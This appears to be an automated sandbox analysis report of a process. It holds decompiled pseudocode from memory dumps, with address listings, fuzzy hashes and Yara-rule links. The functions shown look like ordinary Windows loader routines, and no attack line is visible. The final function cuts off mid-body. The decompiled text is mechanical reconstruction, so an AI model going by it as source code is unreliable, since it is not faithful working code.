																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L03858F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03883C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0385d5f2
0x0385d5f5
0x0385d5f5
0x0385d5fd
0x0385d600
0x0385d60a
0x0385d60d
0x0385d617
0x0385d61d
0x0385d627
0x0385d62e
0x0385d911
0x0385d913
0x00000000
0x0385d919
0x0385d919
0x0385d919
0x0385d634
0x0385d634
0x0385d634
0x0385d634
0x0385d640
0x0385d8bf
0x00000000
0x0385d646
0x0385d646
0x0385d64d
0x0385d652
0x038ab2fc
0x038ab2fc
0x038ab302
0x038ab33b
0x038ab341
0x00000000
0x038ab304
0x038ab304
0x038ab319
0x038ab31e
0x038ab324
0x038ab326
0x038ab332
0x038ab347
0x038ab34c
0x038ab351
0x038ab35a
0x00000000
0x038ab328
0x038ab328
0x00000000
0x038ab328
0x038ab326
0x0385d658
0x0385d658
0x0385d65b
0x0385d665
0x00000000
0x0385d66b
0x0385d66b
0x0385d66b
0x0385d66b
0x0385d66d
0x0385d672
0x0385d67a
0x00000000
0x00000000
0x0385d680
0x0385d686
0x0385d8ce
0x0385d8d4
0x0385d8dd
0x0385d8e0
0x0385d68c
0x0385d691
0x0385d69d
0x0385d6a2
0x0385d6a7
0x0385d6b0
0x0385d6b5
0x0385d6e0
0x0385d6b7
0x0385d6b7
0x0385d6b9
0x0385d6b9
0x0385d6bb
0x0385d6bd
0x0385d6ce
0x0385d6d0
0x0385d6d2
0x038ab363
0x038ab365
0x00000000
0x038ab36b
0x00000000
0x038ab36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0385d6bf
0x0385d6bf
0x0385d6e5
0x0385d6e7
0x0385d6e9
0x0385d6ec
0x0385d6ec
0x0385d6ef
0x0385d6f5
0x0385d6f9
0x0385d6fb
0x0385d6fd
0x0385d701
0x0385d703
0x0385d70a
0x0385d70a
0x0385d701
0x0385d710
0x0385d710
0x0385d6c1
0x0385d6c1
0x0385d6c6
0x038ab36d
0x038ab36f
0x00000000
0x038ab375
0x038ab375
0x038ab375
0x00000000
0x038ab375
0x00000000
0x0385d6cc
0x0385d6d8
0x0385d6d8
0x0385d6d8
0x00000000
0x0385d6c6
0x0385d6bf
0x00000000
0x0385d6da
0x0385d6da
0x0385d716
0x0385d71b
0x0385d720
0x0385d726
0x0385d726
0x0385d72d
0x00000000
0x0385d733
0x0385d739
0x0385d742
0x0385d750
0x0385d758
0x0385d764
0x0385d776
0x0385d77a
0x0385d783
0x0385d928
0x0385d92c
0x0385d93d
0x0385d944
0x0385d94f
0x0385d954
0x0385d956
0x0385d95f
0x0385d961
0x0385d973
0x0385d973
0x0385d956
0x0385d944
0x0385d92c
0x0385d78b
0x038ab394
0x0385d791
0x0385d798
0x038ab3a3
0x038ab3bb
0x038ab3bb
0x0385d7a5
0x0385d866
0x0385d870
0x0385d884
0x0385d892
0x0385d898
0x0385d89e
0x0385d8a0
0x0385d8a6
0x0385d8ac
0x0385d8ae
0x0385d8b4
0x0385d8b4
0x0385d8ae
0x0385d7a5
0x0385d78b
0x0385d7b1
0x038ab3c5
0x038ab3c5
0x0385d7c3
0x0385d7ca
0x0385d7e5
0x0385d7eb
0x0385d8eb
0x0385d8ed
0x00000000
0x0385d8f3
0x0385d8f3
0x0385d8f3
0x00000000
0x0385d8ed
0x0385d7cc
0x0385d7cc
0x0385d7d2
0x00000000
0x0385d7d4
0x0385d7d4
0x0385d7d7
0x0385d7df
0x038ab3d4
0x038ab3d9
0x038ab3dc
0x038ab3dc
0x038ab3df
0x038ab3e2
0x038ab468
0x038ab46d
0x038ab46f
0x038ab46f
0x038ab475
0x0385d8f8
0x0385d8f9
0x0385d8fd
0x038ab3e8
0x038ab3e8
0x038ab3eb
0x038ab3ed
0x00000000
0x038ab3ef
0x038ab3ef
0x038ab3f1
0x038ab3f4
0x038ab3fe
0x038ab404
0x038ab409
0x038ab40e
0x038ab410
0x038ab410
0x038ab414
0x038ab414
0x038ab41b
0x038ab420
0x038ab423
0x038ab425
0x038ab427
0x038ab42a
0x038ab42d
0x038ab42d
0x038ab42a
0x038ab432
0x038ab436
0x038ab438
0x038ab43b
0x038ab43b
0x038ab449
0x038ab44e
0x038ab454
0x038ab458
0x038ab458
0x038ab45d
0x00000000
0x038ab45d
0x038ab3ed
0x00000000
0x00000000
0x00000000
0x0385d7df
0x0385d7d2
0x0385d7ca
0x038ab37c
0x038ab37e
0x038ab385
0x038ab38a
0x00000000
0x038ab38a
0x0385d742
0x0385d7f1
0x0385d7f8
0x038ab49b
0x038ab49b
0x0385d800
0x0385d837
0x0385d843
0x0385d845
0x0385d847
0x0385d84a
0x0385d84b
0x0385d84e
0x0385d857
0x0385d802
0x0385d802
0x0385d80d
0x00000000
0x0385d818
0x0385d818
0x0385d824
0x0385d831
0x038ab4a5
0x038ab4ab
0x038ab4b3
0x038ab4b8
0x038ab4bb
0x00000000
0x038ab4c1
0x038ab4c1
0x038ab4c8
0x00000000
0x038ab4ce
0x038ab4d4
0x038ab4e1
0x038ab4e3
0x038ab4e5
0x00000000
0x038ab4eb
0x038ab4f0
0x038ab4f2
0x0385dac9
0x0385dacc
0x0385dacf
0x0385dad1
0x0385dd78
0x0385dd78
0x0385dcf2
0x00000000
0x0385dad7
0x0385dad9
0x0385dadb
0x00000000
0x00000000
0x0385dae1
0x0385dae1
0x0385dae4
0x0385dae6
0x038ab4f9
0x038ab4f9
0x038ab500
0x0385daec
0x0385daec
0x0385daf5
0x0385daf8
0x0385dafb
0x0385db03
0x0385db11
0x0385db16
0x0385db19
0x0385db1b
0x038ab52c
0x038ab531
0x038ab534
0x0385db21
0x0385db21
0x0385db24
0x0385dcd9
0x0385dce2
0x0385dce5
0x0385dd6a
0x0385dd6d
0x00000000
0x0385dd73
0x038ab51a
0x038ab51c
0x038ab51f
0x038ab524
0x00000000
0x038ab524
0x0385dce7
0x0385dce7
0x0385dce7
0x00000000
0x0385dce7
0x00000000
0x0385db2a
0x0385db2c
0x0385db31
0x0385db33
0x0385db36
0x0385db39
0x0385db3b
0x0385db66
0x0385db66
0x0385db3d
0x0385db3d
0x0385db3e
0x0385db46
0x0385db47
0x0385db49
0x0385db4c
0x0385db53
0x0385db55
0x0385db58
0x0385db5a
0x038ab50a
0x038ab50f
0x038ab512
0x0385db60
0x0385db60
0x0385db63
0x0385db63
0x00000000
0x0385db63
0x0385db5a
0x0385db3b
0x0385db24
0x0385db69
0x0385db69
0x0385db6c
0x0385db6f
0x0385db74
0x038ab557
0x038ab557
0x038ab55e
0x0385db7a
0x0385db7c
0x0385db7f
0x0385db82
0x0385db85
0x00000000
0x0385db8b
0x0385db8b
0x0385db8d
0x0385db9b
0x0385db9b
0x0385db9d
0x0385dba0
0x0385dba2
0x0385dba4
0x0385dba7
0x0385dba9
0x0385dbae
0x0385dbae
0x0385dbb1
0x0385dbb4
0x0385dbb4
0x0385dbb7
0x0385dbba
0x0385dcd2
0x0385dcd4
0x00000000
0x0385dbc0
0x0385dbc0
0x0385dbd2
0x0385dbd7
0x0385dbda
0x0385dbdd
0x0385dbdf
0x00000000
0x0385dbe5
0x0385dbe5
0x0385dbee
0x0385dbf1
0x038ab541
0x038ab544
0x00000000
0x038ab546
0x038ab546
0x00000000
0x038ab546
0x0385dbf7
0x0385dbf7
0x0385dbfd
0x0385dbfd
0x0385dbff
0x0385dc0b
0x0385dc15
0x0385dc1b
0x0385dc1d
0x0385dc21
0x0385dc21
0x0385dc23
0x0385dc23
0x0385dc26
0x0385dc29
0x0385dc2b
0x00000000
0x00000000
0x0385dc31
0x0385dc34
0x0385dc36
0x0385dcbf
0x0385dcbf
0x0385dcc2
0x00000000
0x0385dc3c
0x0385dc41
0x0385dc43
0x00000000
0x0385dc45
0x0385dc45
0x0385dc47
0x00000000
0x0385dc4d
0x0385dc4d
0x0385dc50
0x0385dc52
0x0385dc55
0x0385dcfa
0x0385dcfe
0x0385dd08
0x0385dd0a
0x0385dd0c
0x00000000
0x0385dd12
0x0385dd15
0x0385dd2d
0x0385dd2f
0x0385dd32
0x0385dd35
0x00000000
0x0385dd35
0x0385dc5b
0x0385dc5b
0x0385dc5e
0x0385dc61
0x0385dc64
0x0385dc67
0x0385dc67
0x0385dc6a
0x0385dc6c
0x0385dc8e
0x0385dc8e
0x0385dc91
0x0385dc93
0x0385dcce
0x0385dcce
0x0385dc95
0x0385dc9c
0x0385dc6e
0x0385dc72
0x0385dc75
0x0385dc77
0x0385dc79
0x038ab551
0x038ab551
0x00000000
0x0385dc7f
0x0385dc7f
0x0385dc81
0x00000000
0x0385dc83
0x0385dc86
0x0385dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0385dc88
0x0385dc81
0x0385dc79
0x0385dc6c
0x0385dc55
0x0385dc47
0x0385dc43
0x00000000
0x0385dc36
0x0385dc23
0x00000000
0x0385dbff
0x0385dbf1
0x0385dbdf
0x0385db8f
0x0385db92
0x0385db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0385db95
0x0385db8d
0x0385db85
0x0385db74
0x0385dc9f
0x0385dca2
0x0385dcb0
0x0385dcb0
0x0385dad1
0x038ab4e5
0x038ab4c8
0x00000000
0x00000000
0x00000000
0x0385d831
0x0385d80d
0x00000000
0x0385d800
0x038ab47f
0x038ab485
0x00000000
0x038ab485
0x0385d665
0x0385d652
0x00000000

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f10ed4fd4c17e069c705d3479de8c204900dce1614b32f4ad3e3450f377e520
Instruction ID: 6e0fa076a50daae9a0b1e4b682f3e1d0ada9deaa0df1c6ab4ac275c50c5e85af
Opcode Fuzzy Hash: 7f10ed4fd4c17e069c705d3479de8c204900dce1614b32f4ad3e3450f377e520
Instruction Fuzzy Hash: E8E1D274A05759CFEB21DFA8C840B69B7B6BF85308F0801D9ED09DB290D7749D89CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0385849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0385849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x391f9c0);
				E0389D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x3937b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0385CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03862280( *[fs:0x30], 0x3938550);
						_t139 =  *0x3937b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0387F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0385FFB0(_t193, _t235, 0x3938550);
								L5:
								return E0389D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E03841C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x3937b9c; // 0x0
							_t235 = L03864620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x3937b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0387A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0385FFB0(_t193, _t235, 0x3938550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L038677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L038677F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x3937b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x3937b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E038837C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x3937b9c; // 0x0
									_t214 = L03864620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E038837F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x3937b10 =  *0x3937b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x3937b04 =  *0x3937b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L038677F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L038677F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x3937b08 =  *0x3937b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E038857C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0388F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L038677F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0387A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L038677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E038896C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0385849b
0x0385849b
0x0385849b
0x0385849b
0x0385849d
0x038584a2
0x038584a7
0x038584b1
0x038584d8
0x00000000
0x038584b3
0x038584c4
0x038584c9
0x038584cd
0x038584cf
0x038584cf
0x038584d6
0x038584e6
0x038584e9
0x038584ec
0x038584ef
0x038584f2
0x038584f4
0x038584fc
0x03858501
0x03858506
0x03858509
0x038586e0
0x038586e5
0x038586e8
0x038586ed
0x038586f0
0x038586f2
0x038a9afd
0x038a9b02
0x038584da
0x038584df
0x038584df
0x038586fa
0x038586fd
0x038586fe
0x03858701
0x03858706
0x03858709
0x0385870b
0x00000000
0x00000000
0x03858711
0x03858725
0x03858727
0x0385872a
0x0385872c
0x038a9af0
0x038a9af5
0x03858732
0x03858732
0x03858732
0x03858735
0x03858737
0x03858515
0x03858515
0x03858518
0x0385851d
0x03858523
0x03858527
0x0385852b
0x03858537
0x03858539
0x0385853c
0x0385853e
0x0385868c
0x03858691
0x03858699
0x0385869b
0x03858744
0x03858748
0x038586a1
0x038586a1
0x038586a1
0x038586a4
0x038586a8
0x038a9bdf
0x038a9bdf
0x038586ae
0x038586b0
0x00000000
0x038586b6
0x00000000
0x038a9be9
0x038586b0
0x03858544
0x0385854a
0x0385854d
0x03858551
0x0385876e
0x03858778
0x0385877b
0x03858780
0x03858557
0x03858557
0x0385855d
0x0385855d
0x0385856b
0x0385856e
0x03858570
0x03858573
0x03858576
0x03858576
0x03858579
0x0385857b
0x00000000
0x00000000
0x03858581
0x038585a0
0x038585a2
0x038585a5
0x038585a7
0x038a9b1b
0x038a9b1b
0x0385862e
0x0385862e
0x03858631
0x03858631
0x03858634
0x03858636
0x03858669
0x03858669
0x0385866b
0x038a9bbf
0x038a9bc4
0x038a9bc8
0x038a9bce
0x038a9bce
0x03858671
0x03858671
0x03858674
0x03858676
0x038a9bae
0x038a9bae
0x03858676
0x0385867c
0x0385867e
0x03858688
0x03858688
0x00000000
0x0385867e
0x03858638
0x03858638
0x0385863b
0x0385863e
0x0385863f
0x03858642
0x03858645
0x03858648
0x0385864d
0x038a9b69
0x038a9b6e
0x038a9b7b
0x038a9b81
0x038a9b85
0x038a9b89
0x038a9ba7
0x038a9b8b
0x038a9b91
0x038a9b9a
0x038a9b9f
0x038a9b9f
0x03858788
0x0385878d
0x03858763
0x03858763
0x03858766
0x00000000
0x03858766
0x038a9b70
0x00000000
0x038a9b70
0x03858656
0x0385865a
0x0385865c
0x03858752
0x03858756
0x00000000
0x00000000
0x0385875e
0x00000000
0x0385875e
0x03858662
0x03858662
0x03858662
0x03858666
0x00000000
0x03858666
0x038585b7
0x038585b9
0x038585bc
0x038585bf
0x038585cc
0x038585d1
0x038585d4
0x038585db
0x038585de
0x038585e0
0x038a9b5f
0x00000000
0x038a9b5f
0x038585e6
0x038585ea
0x038586c3
0x038586c5
0x038586c8
0x038586ca
0x038a9b16
0x00000000
0x038a9b16
0x038586d6
0x038585f6
0x038585f6
0x038585f9
0x03858602
0x03858606
0x0385860a
0x0385860b
0x0385860e
0x03858611
0x00000000
0x03858611
0x038585f3
0x00000000
0x038585f3
0x03858619
0x0385861e
0x0385861e
0x03858621
0x03858622
0x03858623
0x03858625
0x0385862c
0x00000000
0x0385873d
0x00000000
0x0385873d
0x03858737
0x0385850f
0x03858512
0x00000000
0x03858512
0x00000000
0x038584d6

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 284bf9a23182154fd7db2e0bcaaf61eebfca9c4654ef897a66c77bd96e5384ce
Instruction ID: 64e85504e681c29585443b2a848ef392c39d3ce9370ec7a72707323b177fe9ce
Opcode Fuzzy Hash: 284bf9a23182154fd7db2e0bcaaf61eebfca9c4654ef897a66c77bd96e5384ce
Instruction Fuzzy Hash: 87B145B4F0425DDFDB14DFE9C984AADBBB9BF48304F1441AAE805EB245D770A945CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1042DFE6, Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, Offset: 10410000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fccb7aa2ba62b126ed190768949d5ff99ada7d0b026eb1b2c1d7c9f5e999e2ee
Instruction ID: a2133f1675bfba6c93c2bac0d204501ef93249a8d1655e072ce3867f543584b5
Opcode Fuzzy Hash: fccb7aa2ba62b126ed190768949d5ff99ada7d0b026eb1b2c1d7c9f5e999e2ee
Instruction Fuzzy Hash: 0ED1BA32968791CFD702CF38E9967453FB1FB46724748428EC9E197592C3382529CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0387513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0387513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x393d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
